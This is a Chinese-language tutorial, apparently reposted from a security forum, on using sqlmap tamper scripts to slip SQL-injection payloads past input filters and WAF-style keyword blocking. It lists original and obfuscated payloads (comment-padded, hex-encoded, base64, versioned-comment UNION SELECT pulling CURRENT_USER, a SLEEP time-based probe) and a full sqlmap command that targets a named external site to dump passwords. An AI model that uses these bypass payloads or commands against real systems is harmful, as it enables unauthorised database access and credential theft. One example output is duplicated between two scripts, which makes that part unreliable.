SQLMAP绕过SQL注入限制

lfjigu

前言：　　SQL注入***是***对数据库进行***的常用手段之一。随着B/S模式应用开发的发展，使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐，相当大一部分程序员在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据。
　　然而随着SQL注入***的高潮过后，越来越多的安全人员想出了防止SQL***的方式，例如利用instr()函数，过滤注入关键字等等的方法。所以如何绕过这些防止***的手段，是目前的安全研究人员们的常规研究方向。
　　关于SQLMAP：
　　Sqlmap是一款开源的命令行自动SQL注入工具。它由Bernardo Damele A.G.和Daniele Bellucci以GNU GPLv2许可证方式发布，可从http://sqlmap.sourceforge.net上下载。
　　Sqlmap用Python开发而成，这使得它能够独立于底层的操作系统，而只需2.4或之后版本的Python解释器即可。为了使事情更容易，许多GNU/Linux在发布时都创新性地附带安装了Python解释器包。Windows、UNIX和Mac OSX也均有提供或者可免费获取。
　　今天我来说说如何绕过注入限制。
　　MYSQL BYPASS
　　脚本：space2hash.py含有免杀功能，对于MYSQL数据库 4.0、5.0注入
　　例子：
　　* 注入语句：1 AND 9227=9227
　　* 替换成为：1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
　　脚本： space2morehash.py含有免杀功能，对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
　　例子：
　　* 注入语句：1 AND 9227=9227
　　* 替换成为：1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
　　如何使用这些BYPASS绕过脚本？ 你可以用SQLMAP的 --tamper 参数。
　　一个注入点：http://sql.dis9.com/sql.php?id=1 我们首先判断他数据库的版本

http://www.f4ck.org/data/attachment/forum/201410/19/120943ocwhcmqzonwpkoo4.png

　　然后选择对于版本的bypass脚本进行使用，我们来尝试一下：：

http://www.f4ck.org/data/attachment/forum/201410/19/121023x6y45im911e56e1y.png

　　看图片的注释，提示版本错误，我们来换个BYPASS脚本，使用space2dash.py试试。
　　这个是SQLite数据库和MYSQL数据库的，例子：
　　* 注入语句：1 AND 9227=9227
　　* 输出：1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
　　尝试一下，看下图，PAYLOAD已经被编码：
　　sqlmap -u "http://sql.dis9.com/sql.php?id=1" -v 3 --password --batch --tamper "space2dash.py"

http://www.f4ck.org/data/attachment/forum/201410/19/121212yoa2aaontmmp4nlo.png

　　换个编码吧，换encodes编码：charencode.py
　　* Microsoft SQL Server 2005
　　* MySQL 4, 5.0 and 5.5
　　* Oracle 10g
　　* PostgreSQL 8.3, 8.4, 9.0
　　* 注入语句：SELECT FIELD FROM%20TABLE
　　* 替换为：%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

http://www.f4ck.org/data/attachment/forum/201410/19/121334p2kt40q6y04k8htq.png

　　base64编码脚本：base64encode.py
　　* 注入语句：1' AND SLEEP(5)#
　　* 替换为：MScgQU5EIFNMRUVQKDUpIw==
　　替换空格和关键字 ：halfversionedmorekeywords.py
　　* 注入语句：
1value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa　　* 替换成：
1value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa　　其他类型数据库看官网介绍吧：https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/
　　MSSQL等等的都有，自己发挥吧。

http://www.f4ck.org/data/attachment/forum/201410/19/121616xvskwhyzxtk474w4.png

　　原文地址，听潮社区http://www.f4ck.org/article-2183-1.html